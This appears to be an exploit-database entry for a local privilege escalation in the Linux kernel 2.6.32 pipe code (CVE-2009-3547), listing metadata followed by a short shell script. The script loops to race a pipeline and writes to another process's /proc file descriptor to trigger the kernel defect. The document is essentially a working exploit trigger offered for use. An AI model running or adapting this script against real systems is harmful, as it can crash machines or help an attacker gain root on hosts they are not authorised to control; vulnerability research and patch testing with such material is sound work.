EXPLOITS

Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)

Author: Earl Chew
type: local
platform: linux
port: 
date_added: 2009-11-11  
date_updated:   
verified: 1  
codes: CVE-2009-3547;OSVDB-59654  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10018.sh  

while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done